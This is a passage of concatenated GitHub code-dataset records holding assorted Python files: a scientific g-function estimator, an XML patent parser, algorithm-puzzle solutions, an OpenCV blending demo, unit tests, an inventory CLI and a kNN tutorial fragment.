gfunc-file)\n if stars is not None and isinstance(stars[0], list):\n stars_i = stars[i]\n elif stars is not None:\n stars_i = stars\n with h5py.File(gfunc_file, 'r') as gfile:\n saved_2d = gfile['header/save2d'][()].decode('ascii') == 'True'\n if not saved_2d and case == '2D':\n raise ValueError('Need 2D functions in output for case=\"2D\"')\n if tau_grid is not None and feh_grid is not None:\n tau_grid_new = gfile['grid/tau'][:]\n feh_grid_new = gfile['grid/feh'][:]\n if not (np.array_equal(tau_grid, tau_grid_new)\\\n and np.array_equal(feh_grid, feh_grid_new)):\n raise ValueError('All g-functions must be defined on ' +\\\n 'the same age/metallicity grid!')\n else:\n tau_grid = gfile['grid/tau'][:]\n feh_grid = gfile['grid/feh'][:]\n for starid in gfile['gfuncs']:\n if stars is None or starid in stars_i:\n gfunc = gfile['gfuncs/' + starid][:]\n # Make gfunc more coarse (optionally, increases performance)\n if grid_slice is not None:\n if saved_2d:\n gfunc = gfunc[grid_slice[0]:grid_slice[1],\n grid_slice[2]:grid_slice[3]]\n else:\n gfunc = gfunc[grid_slice[0]:grid_slice[1]]\n\n if grid_thin is not None:\n if saved_2d:\n gfunc = gfunc[::grid_thin[0], ::grid_thin[1]]\n else:\n gfunc = gfunc[::grid_thin[0]]\n #gfunc = smooth_gfunc2d(gfunc)\n gfunc = norm_gfunc(gfunc)\n g2d.append(gfunc)\n\n g2d = np.array(g2d)\n\n # Make grid more coarse (optionally, increases performance)\n if grid_slice is not None:\n tau_grid = tau_grid[grid_slice[0]:grid_slice[1]]\n feh_grid = feh_grid[grid_slice[2]:grid_slice[3]]\n if grid_thin is not None:\n tau_grid = tau_grid[::grid_thin[0]]\n feh_grid = feh_grid[::grid_thin[1]]\n\n # Number of tau/feh-values and number of stars\n l = len(feh_grid)\n m = len(tau_grid)\n n = g2d.shape[0]\n\n # Define matrix with n g-functions\n # (in 2D case each g-function is flattened first)\n if case == '1D':\n if saved_2d:\n g = np.sum(g2d, axis=2)\n else:\n g = g2d\n k = m\n elif case == '2D':\n k = m*l\n # reshape with \"age-order\" (each row is a sequence of functions\n # like in the '1D' case)\n g = g2d.reshape(n, k, order='F')\n # add small number to avoid log(0)\n g += 1e-10\n\n #------------------------------------------------\n # Set up for estimating age distribution phi(1:k)\n #------------------------------------------------\n\n # weights for integrals over theta\n w = np.ones(k) / k\n\n # constant prior, normalized\n Phi = np.ones(k)\n Phi /= np.dot(w, Phi)\n\n # initial guess for phi and lambda\n phi = Phi\n lamda = -1 # this gives r_j = 0 for beta = 0\n\n # initial beta and step\n if betas is None:\n beta, dbeta, beta_max = 0.01, 0.01, 1.00\n else:\n beta, dbeta, beta_max = betas\n\n # Gw = G matrix, with each column multiplied by w(j)\n gw = g * w\n\n # Derivative matrix\n T = np.diag([-1]+(m-2)*[-2]+[-1])\n T += np.diag((m-1)*[1], k=1)\n T += np.diag((m-1)*[1], k=-1)\n\n if case == '2D':\n T1 = np.diag(np.ones(m)*(-3))\n T1[0][0] = T1[-1][-1] = -2\n T1 += np.diag(np.ones(m-1), k=1)\n T1 += np.diag(np.ones(m-1), k=-1)\n T2 = np.diag(np.ones(m)*(-4))\n T2[0][0] = T2[-1][-1] = -3\n T2 += np.diag(np.ones(m-1), k=1)\n T2 += np.diag(np.ones(m-1), k=-1)\n T_repeat = [T1] + [T2 for i in range(l-2)] + [T1]\n T = block_diag(*T_repeat)\n T += np.diag(np.ones(k-m), k=m)\n T += np.diag(np.ones(k-m), k=-m)\n\n # Tw = T matrix, with each column multiplied by w(j)\n Tw = T * w\n\n # list to hold beta, L, E, R\n Q = []\n # list to hold phi (the age/age-metallicity distribution)\n samd = []\n\n # Perform Newton-Raphson minimisation\n finished = False\n while not finished:\n for iterr in range(max_iter):\n u = np.dot(gw, phi)\n v = np.dot(Tw, phi)\n\n u[u == 0] = 1 # avoid division by zero\n gwu = gw / u[:, np.newaxis]\n Twv = Tw * v[:, np.newaxis]\n\n # residuals\n r = w * (1 + np.log(phi/Phi)) - beta * np.sum(gwu, 0) \\\n + 2*alpha*beta * np.sum(Twv, 0) + lamda * w\n R = np.dot(w, phi) - 1\n\n # Hessian\n H = np.diag(w / phi) + beta * np.dot(gwu.T, gwu) \\\n + 2*alpha*beta * np.dot(Tw.T, Tw)\n\n # full matrix\n M = np.zeros((k+1, k+1))\n M[:k, :k] = H\n M[-1, :k] = M[:k, -1] = w\n h = np.append(-r, -R)\n\n s = np.append(1/np.sqrt(np.diag(H)), 1.)\n S = np.diag(s)\n M1 = np.dot(np.dot(S, M), S)\n h1 = np.dot(S, h)\n\n con = np.linalg.cond(M1)\n if con is np.inf:\n finished = True\n break\n\n Delta1 = np.linalg.solve(M1, h1)\n Delta = np.dot(S, Delta1)\n\n Delta_phi = Delta[:k]\n Delta_lambda = Delta[-1]\n\n f = 1.\n phi_test = phi + f * Delta_phi\n while min(phi_test) < 0:\n f *= 0.5\n phi_test = phi + f * Delta_phi\n phi = phi_test\n lamda += f * Delta_lambda\n\n phi[phi < min_tol] = min_tol\n if beta >= beta_max:\n finished = True\n break\n\n # re-normalise to avoid exponential growth of rounding errors\n phi /= np.dot(w, phi)\n\n if case == '1D':\n samd.append(phi)\n elif case == '2D':\n samd.append(phi.reshape(m, l, order='F'))\n\n # entropy\n E = np.sum(w * phi * np.log(phi / Phi))\n\n # total negative log-likelihood\n L = -np.sum(np.log(np.dot(gw, phi)))\n\n # total regularization term\n R = np.sum(np.dot(Tw, phi)**2)\n\n # add to list Q\n Q.append([beta, L, E, R])\n\n beta += dbeta\n\n return samd, Q, tau_grid, feh_grid\n","repo_name":"csahlholdt/gfunc2D","sub_path":"gfunc2d/gstats.py","file_name":"gstats.py","file_ext":"py","file_size_in_byte":19836,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"7668026000","text":"# -*- coding:utf-8 -*-\nimport xml.etree.ElementTree as ET\n\n# reference : https://stackabuse.com/reading-and-writing-xml-files-in-python/\n\ndef parseXml49():\n\tpath = \"../data_set/\"\n\tfile_name = \"CLMS_US_0049\"\n\tinput_name = file_name + \".xml\"\n\toutput_name = file_name + \"_parsed.xml\"\n\n\ttree = ET.parse(path + input_name) # 파일을 이용한 파싱\n\troot = tree.getroot()\n\n\t# create the file structure\n\tdata = ET.Element('data')\n\n\tfor CLAIMs in root: # tag : CLAIMs\n\t\tfor CLAIM in CLAIMs: # tag : CLAIM\t\n\t\t\tfor PARA in CLAIM: # tag : PARA, CLMSTEP\n\t\t\t\tif 'PARA' not in PARA.tag:\n\t\t\t\t\tbreak\n\t\t\t\t# print(PARA.tag, PARA.text)\n\t\t\t\tfor PTEXT in PARA: # tag : PARA -> PTEXT\n\t\t\t\t\tif 'PTEXT' not in PTEXT.tag:\n\t\t\t\t\t\tbreak\n\t\t\t\t\titem = ET.SubElement(data, 'item')\n\t\t\t\t\tcheckRef = False\n\t\t\t\t\tflag = True\n\n\t\t\t\t\tfor ele in PTEXT: # tag : ele -> PDAT, CLREF, PDAT\n\t\t\t\t\t\tif 'CLREF' in ele.tag :\n\t\t\t\t\t\t\tCLREF = ET.SubElement(item, 'CLREF')\n\t\t\t\t\t\t\tCLREF.set('CLREF',ele.attrib['ID'])\n\t\t\t\t\t\t\tcheckRef = True\n\t\t\t\t\t\tif 'PDAT' in ele.tag :\n\t\t\t\t\t\t\tif(flag) :\n\t\t\t\t\t\t\t\tPDAT1 = ET.SubElement(item, 'PDAT1')\n\t\t\t\t\t\t\t\tPDAT1.text = ele.text\n\t\t\t\t\t\t\t\tflag = False\n\t\t\t\t\t\t\telse : \n\t\t\t\t\t\t\t\tPDAT2 = ET.SubElement(item, 'PDAT2')\n\t\t\t\t\t\t\t\tPDAT2.text = ele.text\n\t\t\t\t\tif checkRef == False:\n\t\t\t\t\t\tdata.remove(item)\n\n\tfilter_file = open(path + output_name, 'w')\t\t\t\t\t\t\t\n\tmydata = ET.tostring(data)\n\tfilter_file.write(mydata)\n\tfilter_file.close()\n\ndef parseXml59():\n\tpath = \"../data_set/\"\n\tfile_name = \"CLMS_US_0059\"\n\tinput_name = file_name + \".xml\"\n\toutput_name = file_name + \"_parsed.xml\"\n\n\ttree = ET.parse(path + input_name)\n\troot = tree.getroot()\n\n\t# create the file structure\n\tdata = ET.Element('data')\n\n\tfor CLAIMs in root: # tag : CLAIMs\n\t\tfor CLAIM in CLAIMs: # tag : CLAIM\n\t\t\tfor claim_text in CLAIM: # tag : claim-text\n\t\t\t\tif 'claim-text' not in claim_text.tag:\n\t\t\t\t\tbreak\n\t\t\t\tfor claim_ref in claim_text: # tag : claim-ref\n\t\t\t\t\tif 'claim-ref' in claim_ref.tag:\n\t\t\t\t\t\titem = ET.SubElement(data, 'item')\n\t\t\t\t\t\t\n\t\t\t\t\t\tPDAT1 = ET.SubElement(item, 'PDAT1')\n\t\t\t\t\t\tPDAT1.text = claim_text.text\n\n\t\t\t\t\t\tCLREF = ET.SubElement(item, 'CLREF')\n\t\t\t\t\t\tCLREF.set('CLREF',claim_ref.attrib['idref'])\n\n\t\t\t\t\t\tPDAT2 = ET.SubElement(item, 'PDAT2')\n\t\t\t\t\t\tPDAT2.text = claim_ref.tail\n\t\t\t\t\t\t\n\n\tfilter_file = open(path + output_name, 'w')\t\t\t\t\t\t\t\n\tmydata = ET.tostring(data)\n\tfilter_file.write(mydata)\n\tfilter_file.close()\n\nparseXml59()\n","repo_name":"duqrlpig/patent_ml_project","sub_path":"patent_parser/XmlParser/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"43063105213","text":"import sys\r\nfrom collections import deque\r\ninput = sys.stdin.readline\r\n\r\ndef main():\r\n dslr = DSLR() # 클래스 호출\r\n for _ in range(int(input())):\r\n s, e = map(int, input().split())\r\n dslr.input_data(s, e)\r\n dslr.p() # 정답 출력\r\n\r\nclass DSLR:\r\n def __init__(self):\r\n self.li = [] # 출력할 명령어 나열을 저장할 리스트\r\n\r\n # 큐를 사용해서 주어진 정수 A, B를\r\n # A는 DSLR 연산을, B는 DSLR 연산을 반대로 취해서\r\n # 중간 지점에서 만날 때까지 탐색하는 함수\r\n def searching(self):\r\n while True:\r\n xs, ys = self.sq.popleft(), self.eq.popleft()\r\n self.xt = []\r\n self.yt = []\r\n\r\n # DSLR 연산을 수행한 결과를 큐에 저장\r\n for x in xs:\r\n x0 = (x<<1)%10000\r\n if self.fx(x, x0, \"D\"): return\r\n x1 = (x-1)%10000\r\n if self.fx(x, x1, \"S\"): return\r\n x2 = (x*10)%10000 + x//1000\r\n if self.fx(x, x2, \"L\"): return\r\n x3 = x%10*1000 + x//10\r\n if self.fx(x, x3, \"R\"): return\r\n self.sq.append(self.xt)\r\n\r\n # DSLR 연산을 반대로 수행한 결과를 큐에 저장\r\n for y in ys:\r\n if not y%2:\r\n y0 = y>>1\r\n if self.fy(y, y0, \"D\"): return\r\n y0 += 5000\r\n if self.fy(y, y0, \"D\"): return\r\n y1 = (y+1)%10000\r\n if self.fy(y, y1, \"S\"): return\r\n y2 = y%10*1000 + y//10\r\n if self.fy(y, y2, \"L\"): return\r\n y3 = (y*10)%10000 + y//1000\r\n if self.fy(y, y3, \"R\"): return\r\n self.eq.append(self.yt)\r\n\r\n # DSLR 연산 후 처음 방문한 정수는 연산을 기록해서 방문을 표시하고 \r\n # 반대쪽이 도달한 정수와 겹치면 두 연산 기록을 합쳐서 self.li에 기록\r\n def fx(self, x: int, nx: int, op: str):\r\n if nx not in self.sd:\r\n self.sd[nx] = self.sd[x] + op\r\n if nx in self.ed:\r\n self.li.append(self.sd[nx] + self.ed[nx])\r\n return True\r\n self.xt.append(nx)\r\n\r\n # DSLR 연산을 반대로 수행 후 나머지는 self.fx와 같음\r\n def fy(self, y: int, ny: int, op: str):\r\n if ny not in self.ed:\r\n self.ed[ny] = op + self.ed[y]\r\n if ny in self.sd:\r\n self.li.append(self.sd[ny] + self.ed[ny])\r\n return True\r\n self.yt.append(ny)\r\n\r\n # 입력 받은 두 정수로 탐색할 큐와 방문 기록할 딕셔너리를 각각 생성 후 탐색 함수 실행\r\n def input_data(self, s: int, e: int):\r\n self.sd = {s: \"\"}\r\n self.ed = {e: \"\"}\r\n self.sq = deque([[s]])\r\n self.eq = deque([[e]])\r\n self.searching()\r\n \r\n def p(self):\r\n print(\"\\n\".join(self.li))\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()","repo_name":"k4west/Baekjoon_Python","sub_path":"백준/Gold/9019. DSLR/DSLR.py","file_name":"DSLR.py","file_ext":"py","file_size_in_byte":3029,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"599321920","text":"import numpy as np\nimport cv2\n\nimg = cv2.imread('messi5.jpg')\nimg2 = cv2.imread('opencv-logo.png')\n\nprint(img.shape)\nprint(img.size)\nprint(img.dtype)\n\nb,g,r= cv2.split(img)\nimg = cv2.merge((b,g,r))\n\n# Region of interest\nball = img[280:340, 330:390]\nimg[273:333, 100:160] = ball\n\n#Reshaping two images\nimg = cv2.resize(img, (512,512))\nimg2 = cv2.resize(img2, (512,512))\n\n#Adding two images\n#outImg = cv2.add(img, img2) # without specifying any opeque values (Weighted values)\n\noutImg = cv2.addWeighted(img, .8, img2, 0.2, 0) # 0.8 is for img weight and 0.2 is img2 weight and 0 is gamma ( Scalar value )\n\n\ncv2.imshow(\"Imgae\", outImg)\ncv2.waitKey(0)\ncv2.destroyAllWindows()","repo_name":"SwapnilSilam/py-open-cv-samples","sub_path":"samples/7_add_two_images.py","file_name":"7_add_two_images.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"15896843513","text":"#!/usr/bin/env python3\n\nimport markup\nimport sys\n\ndef m(cat):\n return markup.markup(cat, lambda x: x)\n\nrules = []\n\nfor line in sys.stdin:\n try:\n left_cat, right_cat, cat, head, name = line.split()\n rule = '{}\\t{}\\t{}\\t{}\\t{}'.format(m(left_cat),\n m(right_cat), m(cat), head, name)\n if rule not in rules:\n rules.append(rule)\n except ValueError:\n old_cat, new_cat, name = line.split()\n rule = '{}\\t{}\\t{}'.format(m(old_cat), m(new_cat),\n name)\n if rule not in rules:\n rules.append(rule)\n\nfor rule in rules:\n print(rule)\n","repo_name":"rug-compling/epar","sub_path":"scripts/grammar_markup.py","file_name":"grammar_markup.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"35"} +{"seq_id":"28405429682","text":"from parchmint import Component\n\nfrom pymint.constraints.layoutconstraint import LayoutConstraint, OperationType\n\n\nclass RotationConstraint(LayoutConstraint):\n \"\"\"Layout constraint that fixed the absolute rotation\n of the component\n\n \"\"\"\n\n def __init__(self, component: Component, rotation: float) -> None:\n \"\"\"Creates a Rotation constraint\n\n Args:\n component (Component): Component to be covered by the constraint\n rotation (float): rotation fixed by the constraint\n \"\"\"\n super().__init__(OperationType.EXPLICIT_OPERATION)\n self._components.append(component)\n self.rotation = rotation\n self._type = \"ROTATION_CONSTRAINT\"\n\n @property\n def component(self) -> Component:\n \"\"\"Returns the component covered by the constraint\n\n Returns:\n Component: constrianed component\n \"\"\"\n return self._components[0]\n\n @property\n def rotation(self) -> float:\n \"\"\"Returns the rotation fixed by the rotation\n\n Returns:\n float: rotation value\n \"\"\"\n if self._params.exists(\"rotation\"):\n return self._params.get_param(\"rotation\")\n else:\n raise KeyError(\"rotation not set in the constraint\")\n\n @rotation.setter\n def rotation(self, rotation: float) -> None:\n \"\"\"Sets the rotation fixed by the constraint\n\n Args:\n rotation (float): rotation value\n \"\"\"\n self._params.set_param(\"rotation\", rotation)\n","repo_name":"CIDARLAB/pyMINT","sub_path":"pymint/constraints/rotationconstraint.py","file_name":"rotationconstraint.py","file_ext":"py","file_size_in_byte":1519,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"10750039614","text":"from teeth_overlord import errors\nfrom teeth_overlord import models\nfrom teeth_overlord import scheduler\nfrom teeth_overlord import tests\n\n\nclass TestInstanceScheduler(tests.TeethMockTestUtilities):\n\n def setUp(self):\n super(TestInstanceScheduler, self).setUp()\n\n self.add_mock(models.Instance, 'batch')\n self.add_mock(models.Chassis, 'batch')\n\n self.scheduler = scheduler.TeethInstanceScheduler()\n\n self.instance1 = models.Instance(id='instance1',\n name='instance1_name',\n flavor_id='flavor1',\n image_id='image1')\n\n self.flavorprovider1 = models.FlavorProvider(\n flavor_id='flavor1',\n chassis_model_id='chassismodel1',\n deleted=False)\n\n self.chassis1 = models.Chassis(\n id='chassis1',\n state=models.ChassisState.READY)\n\n def test_reserve_chassis(self):\n self.add_mock(models.Instance)\n chassis_mock = self.add_mock(models.Chassis,\n return_value=[self.chassis1])\n flavor_provider_mock = self.add_mock(\n models.FlavorProvider,\n return_value=[self.flavorprovider1])\n\n self.scheduler.reserve_chassis(self.instance1, retry=False)\n\n flavor_provider_mock.assert_called_once_with(\n 'filter',\n deleted=False,\n flavor_id=self.instance1.flavor_id)\n chassis_mock.assert_called_once_with(\n 'filter',\n state=models.ChassisState.READY)\n chassis_mock.assert_called_once_with(\n 'filter',\n chassis_model_id=self.flavorprovider1.chassis_model_id)\n\n self.assertEqual(self.instance1.chassis_id, self.chassis1.id)\n self.assertEqual(self.instance1.state, models.InstanceState.INACTIVE)\n self.assertEqual(self.chassis1.state, models.ChassisState.BUILD)\n\n instance_batch_mock = self.get_mock(models.Instance, 'batch')\n self.assertEqual(instance_batch_mock().save.call_count, 1)\n\n chassis_batch_mock = self.get_mock(models.Chassis, 'batch')\n self.assertEqual(chassis_batch_mock().save.call_count, 1)\n\n def test_reserve_chassis_already_reserved(self):\n self.chassis1.state = models.ChassisState.ACTIVE\n chassis_mock = self.add_mock(models.Chassis,\n return_value=[self.chassis1])\n flavor_provider_mock = self.add_mock(\n models.FlavorProvider,\n return_value=[self.flavorprovider1])\n\n self.assertRaises(errors.ChassisAlreadyReservedError,\n self.scheduler.reserve_chassis,\n self.instance1,\n retry=False)\n flavor_provider_mock.assert_called_once_with(\n 'filter',\n deleted=False,\n flavor_id=self.instance1.flavor_id)\n chassis_mock.assert_called_once_with(\n 'filter',\n state=models.ChassisState.READY)\n chassis_mock.assert_called_once_with(\n 'filter',\n chassis_model_id=self.flavorprovider1.chassis_model_id)\n\n def test_reserve_chassis_no_capacity(self):\n flavor_provider_mock = self.add_mock(models.FlavorProvider,\n return_value=[])\n\n self.assertRaises(errors.InsufficientCapacityError,\n self.scheduler.reserve_chassis,\n self.instance1,\n retry=False)\n flavor_provider_mock.assert_called_once_with(\n 'filter',\n deleted=False,\n flavor_id=self.instance1.flavor_id)\n","repo_name":"rackerlabs/teeth-overlord","sub_path":"teeth_overlord/tests/unit/scheduler.py","file_name":"scheduler.py","file_ext":"py","file_size_in_byte":3731,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"4517005731","text":"import csv\nimport os\n\ndef menu(username=\"@prof-rossetti\", products_count=100):\n # this is a multi-line string, also using preceding `f` for string interpolation\n menu = f\"\"\"\n -----------------------------------\n INVENTORY MANAGEMENT APPLICATION\n -----------------------------------\n Welcome {username}!\n There are {products_count} products in the database.\n operation | description\n --------- | ------------------\n 'List' | Display a list of product identifiers and names.\n 'Show' | Show information about a product.\n 'Create' | Add a new product.\n 'Update' | Edit an existing product.\n 'Destroy' | Delete an existing product.\n 'Reset' | Reset the list of products.\n Please select an operation: \"\"\" # end of multi- line string. also using string interpolation\n return menu\n\ncsv_headers = [\"id\", \"name\", \"aisle\", \"department\", \"price\"]\n\ndef read_products_from_file(filename=\"products.csv\"):\n filepath = os.path.join(os.path.dirname(__file__), \"db\", filename)\n print(f\"READING PRODUCTS FROM FILE: '{filepath}'\")\n products = []\n #TODO: open the file and populate the products list with product dictionaries\n with open(filepath, \"r\") as csv_file:\n reader = csv.DictReader(csv_file)\n for ordered_dict in reader:\n products.append(dict(ordered_dict))\n return products\n\n\n\ndef write_products_to_file(filename=\"products.csv\", products=[]):\n filepath = os.path.join(os.path.dirname(__file__), \"db\", filename)\n print(f\"OVERWRITING CONTENTS OF FILE: '{filepath}' \\n ... WITH {len(products)} PRODUCTS\")\n #TODO: open the file and write a list of dictionaries. each dict should represent a product.\n with open(filepath, \"w\") as csv_file:\n writer = csv.DictWriter(csv_file, fieldnames=csv_headers)\n writer.writeheader()\n for product in products:\n writer.writerow(product)\n\ndef reset_products_file(filename=\"products.csv\", from_filename=\"products_default.csv\"):\n print(\"RESETTING DEFAULTS\")\n products = read_products_from_file(from_filename)\n write_products_to_file(filename, products)\n\n\ndef auto_incremented_id (products):\n return int(products[-1][\"id\"])+1\n\n\ndef run():\n # First, read products from file...\n products = read_products_from_file()\n\n # Then, prompt the user to select an operation...\n #print(menu(username=\"@some-user\")) #TODO instead of printing, capture user input\n number_of_products = len(products)\n my_menu = menu(username = \"@some-user\", products_count = number_of_products)\n operation = input(my_menu)\n #print(\"YOU CHOSE: \" + operation)\n # Then, handle selected operation: \"List\", \"Show\", \"Create\", \"Update\", \"Destroy\" or \"Reset\"...\n operation = operation.title()\n\n if operation == \"List\":\n print(\"LISTING PRODUCTS\")\n for p in products:\n print(\"...\" + p[\"id\"] +\" \"+ p[\"name\"])\n\n\n elif operation == \"Show\":\n print(\"SHOWING A PRODUCT\")\n product_id = input (\"What's the id of the product you want to display?\")\n print(product_id)\n matching_products = [p for p in products if int(p[\"id\"]) == int(product_id)]\n matching_product = matching_products[0]\n print(matching_product)\n\n\n elif operation == \"Create\":\n\n new_id = auto_incremented_id(products)\n new_product = input (\"--What is your new product name? \")\n new_aisle = input (\"--What is your new product's aisle? \")\n new_dept = input (\"--What is your new product's department? \")\n new_price = input (\"--What is your new product's price? \")\n new_product = {\n \"id\": new_id,\n \"name\": new_product,\n \"aisle\": new_aisle,\n \"department\": new_dept,\n \"price\": new_price\n } ## TODO:\n products.append(new_product)\n print(\"YOU HAVE CREATED A NEW PRODUCT: \", new_product)\n\n\n\n\n\n elif operation == \"Update\":\n product_id = input(\"What's the id of the product you would like to update?\")\n matching_products = [p for p in products if int(p[\"id\"]) == int(product_id)]\n matching_product = matching_products[0]\n update_product = input(\"--What is your new product name? Please type the original product name if there is no change: \")\n update_aisle = input(\"--What is your new product aisle? Please type the original aisle name if there is no change: \")\n update_department = input(\"--What is your new product department? Please type the original department name if there is no change: \")\n update_price = input(\"--What is your new product price? please type the original price if there is no change: \")\n matching_product ={\n \"id\": product_id,\n \"name\": update_product,\n \"aisle\": update_aisle,\n \"department\": update_department,\n \"price\": update_price\n }\n print(\"YOU HAVE UPDATED A PRODUCT: \", matching_product)\n\n\n\n elif operation == \"Destroy\":\n product_id = input (\"What's the id of the product you would like to destroy?\")\n matching_products = [p for p in products if int(p[\"id\"]) == int(product_id)]\n matching_product = matching_products[0]\n del products[products.index(matching_product)]\n print(\"DELETING A PRODUCT\")\n\n\n elif operation == \"Reset\":\n reset_products_file()\n return\n\n else:\n print(\"Unrecognized Operation, please select one of 'List',‘Show’,'Create', 'Update', 'Destory' or 'reset'.\")\n\n # Finally, save products to file so they persist after script is done...\n write_products_to_file(products=products)\n# only prompt the user for input if this script is run from the command-line\n# this allows us to import and test this application's component functions\nif __name__ == \"__main__\":\n run()\n","repo_name":"LillianRui/inventory-mgmt-app-py","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5858,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"35852769997","text":"# John Green\n# 1001011958\n# 11/8/13\n\"\"\"\nthe program prints out\n\nkeys\nvalues\nkey and value pairs\nkey and value pairs in order of key\nkey and value pairs in order of value\n\n\"\"\"\n\n\n\ndef main():\n d = {'a':15, 'f':35, 'b':120}\n keys = list(d.keys())\n print(\"The keys are: \", end = \"\")\n for i in keys: # prints the keys\n if i == keys[-1]: # test for last key\n print(i)\n break\n print(i, end = \",\")\n\n values = list(d.values())\n print(\"The values are: \", end = \"\")\n for i in values: # prints out the values\n if i == values[-1]: # test for last value\n print(i)\n break\n print(i, end = \",\")\n\n items = list(d.items())\n print(\"The (key,value) pairs are: \", end = \"\")\n for i in items: # print item pairs\n if i == items[-1]: # tests for last pair\n print(i)\n break\n print(i, end = \"\")\n\n sets = sorted(d.items())\n print(\"The values in order of the keys are: \", end = \"\")\n for i in sets: # sorts pairs by keys\n if i == sets[-1]: # tests for last pair\n print(i)\n break\n print(i, end = \",\")\n \n values.sort()\n print(\"The keys in order of the values are: \", end = \"\")\n for i in values: # sorts pairs by values\n for N in sets:\n if N[1] == i:\n if i == values[-1]:# tests for last pair\n print(N)\n break\n print(N, end = \",\")\n\n\nmain()\n","repo_name":"JohnJGreen/1310Python","sub_path":"hw08/hw08_task1.py","file_name":"hw08_task1.py","file_ext":"py","file_size_in_byte":1499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"30796920411","text":"# Enter your code here. Read input from STDIN. Print output to STDOUT\\\n# Complete the journeyToMoon function below.\nimport sys\n\ndef dfs_count(graph, visited, node, count):\n if visited[node]==False:\n visited[node]=True\n count+=1\n for n in graph[node]:\n count = dfs_count(graph, visited, n, count)\n return count\n \nsys.setrecursionlimit(1500)\nn,p= input().split()\nn = int(n)\np = int(p)\n\nastronaut = []\nfor _ in range(p):\n astronaut.append(list(map(int, input().split())))\ngraph=[[] for _ in range(n)]\nfor i in range(p):\n graph[astronaut[i][0]].append(astronaut[i][1])\n graph[astronaut[i][1]].append(astronaut[i][0])\n\ncountarr=[]\nvisited=[False for _ in range(n)]\nfor i in range(n):\n if visited[i]==False:\n count=0\n count = dfs_count(graph, visited, i, count)\n countarr.append(count)\n\nif len(countarr)>1:\n res=countarr[0]*countarr[1]\n csum=countarr[0]+countarr[1]\n for i in countarr[2:]:\n res+=csum*i\n csum+=i\n print(res)\nelse:\n print(0)\n","repo_name":"tashif-hoda/APS-2020","sub_path":"journey to the moon.py","file_name":"journey to the moon.py","file_ext":"py","file_size_in_byte":1041,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"26668050135","text":"#Sara Nersisian\r\n#CS 1260\r\n#Project 1 - Problem 2\r\n#11/14/2020\r\n\r\nimport math\r\nprint(\"\\n*** Quadretic Equation Solver ***\")\r\na = int(input(\"Enter a: \"))\r\nb = int(input(\"Enter b: \"))\r\nc = int(input(\"Enter c: \"))\r\n\r\ndeterminant = (b ** 2) - 4 * a * c\r\n\r\nif determinant > 0:\r\n x1 = (-1 * b + math.sqrt(determinant)) / (2 * a)\r\n x2 = (-1 * b - math.sqrt(determinant)) / (2 * a)\r\n print(\"\\nThe two real roots are %.2f and %.2f\" %(x1,x2))\r\nelif determinant == 0:\r\n x = (-1 * b ) / (2 * a)\r\n print(\"\\nThe Only real root is %.2f\" %(x))\r\nelse:\r\n print(\"\\nNo real roots! \")\r\n \r\n \r\n \r\n \r\n","repo_name":"saraNersisian/Introductory-Python","sub_path":"Pj1_P2_QuadreticEquation.py","file_name":"Pj1_P2_QuadreticEquation.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"42773766122","text":"\"\"\"\nDeveloper: vkyprmr\nFilename: knn.py\nCreated on: 2020-09-03 at 16:46:57\n\"\"\"\n\"\"\"\nModified by: vkyprmr\nLast modified on: 2020-09-03 at 18:52:19\n\"\"\"\n\n\n# Imports\nfrom loaddata import LoadData\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.neighbors import KNeighborsClassifier, KNeighborsRegressor\nimport mglearn\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\n\n# Data\nld = LoadData()\n\nX_forge, y_forge = ld.load_forge(visualize=False)\nX_forge_train, X_forge_test, y_forge_train, y_forge_test = train_test_split(X_forge, y_forge, random_state=0)\n\n\n# Classifier\nknc = KNeighborsClassifier(n_neighbors=2)\nknc.fit(X_forge_train, y_forge_train)\npreds = knc.predict(X_forge_test)\n\nprint(f'Score: {knc.score(X_forge_test, y_forge_test)}')\n\n\n# Finding optimal 'n_neighbors' by comparing train and test scores/acc\ntrain_acc = []\ntest_acc = []\nK = range(1,10)\nfor k in K:\n knc = KNeighborsClassifier(n_neighbors=k)\n knc.fit(X_forge_train, y_forge_train)\n train = knc.score(X_forge_train, y_forge_train)\n train_acc.append(train)\n test = knc.score(X_forge_test, y_forge_test)\n test_acc.append(test)\n\n# Plot the elbow\nplt.plot(K, train_acc, 'bx-')\nplt.plot(K, test_acc)\nplt.xlabel('k')\nplt.ylabel('Acc')\nplt.title('Train acc vs. Test acc')\nplt.show()\n\n\n# Visualizing different possibilities\nfig, axes = plt.subplots(2,3)\nn_neighbors = [1,3,9,12,15,18]\nfor n_neighbors, ax in zip(n_neighbors, axes.flatten()):\n knc = KNeighborsClassifier(n_neighbors)\n knc.fit(X_forge, y_forge)\n mglearn.plots.plot_2d_separator(knc, X_forge, fill=True, eps=0.5, ax=ax, alpha=0.3)\n mglearn.discrete_scatter(X_forge[:,0], X_forge[:,1], y_forge, ax=ax)\n ax.set_title(f'{n_neighbors} neighbor(s)')\n ax.set_xlabel('Feature A')\n ax.set_ylabel('Feature B')\naxes[0][0].legend()\n\n\"\"\"\n As you can see on the left in the figure, using a single neighbor results in a decision boundary that follows the training data closely. Considering more and more neighbors leads to a smoother decision boundary. A smoother boundary corresponds to a simpler model. In other words, using few neighbors corresponds to high model complexity (as 